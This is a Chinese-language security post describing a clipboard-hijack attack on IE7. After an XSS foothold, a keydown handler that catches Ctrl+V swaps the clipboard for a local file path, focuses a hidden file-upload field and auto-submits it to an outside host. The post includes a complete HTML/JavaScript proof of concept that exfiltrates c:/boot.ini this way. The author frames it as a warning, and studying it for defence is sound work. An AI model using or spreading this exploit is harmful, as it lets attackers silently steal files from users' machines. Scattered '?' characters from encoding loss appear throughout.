Javascript Paste Keyboard Shortcuts Hijack

author : kj021320

team : I.S.T.O

?

這樣的攻擊手段也算是極其無恥 猥瑣之極! 所以防御措施一定要做好

????? 首先說一下通過Javascript Paste Keyboard Shortcuts Hijack能做什么???能夠讀取你本地機器任何文件! 沒錯!也就是說 你中了任何一個XSS 加上你按了粘貼快捷鍵后,你就有可能被別人讀取你機上任何的文件!

那到底是什么回事呢? OK 我慢慢來說

?

首先 我們知道JS是無權限獲讀取你本地任何文件的... 那么我們必須要讓用戶上傳自己的文件!

怎么讓用戶上傳呢? 很簡單! 通過 <input? type=file > 這樣就能讓用戶上傳文件了!

現在又一個問題是, input 為file的時候? value的值 不能用代碼set進去!必須要讓用戶自己填寫! 必須要通過人機交互!

其實說到這里!聰明的你大致也應該明白怎么回事! 接著說! 用戶不可能把自己的文件填寫上去提交給你看的吧?

沒錯~ 那么 就等待用戶 進行快捷鍵粘貼的時候 哈哈~~說說步驟

?

1. 判斷是否 進行 ctrl + v

2. 替換粘貼板

3. 光標切換到 文件上傳

4. 善后工作就交給你了 ( 例如如何把上傳textbox透明化,當前頁面不會因表單提交而跳轉? )

?

IE7 下的 POC :

?

<HTML>
?<HEAD>
? <TITLE> Javascript Paste Keyboard Shortcuts Hijack </TITLE>
?</HEAD>

<body?? οnkeydοwn="temp()">
<input>
<form action="http://www.kj.com" method=post name=s>
<input id=kj_filehijack type=file name=fhijack>
</form>
<script>
function temp()
{
??? if(event.ctrlKey){
??? ??? if(event.keyCode==86){
??? ??? ??? window.clipboardData.setData("text","c:/boot.ini");
??? ??? ??? document.getElementById('kj_filehijack').focus();
??? ??? ??? document.s.submit();
??? ??? }
??? }
}
</script>

</BODY>
</HTML>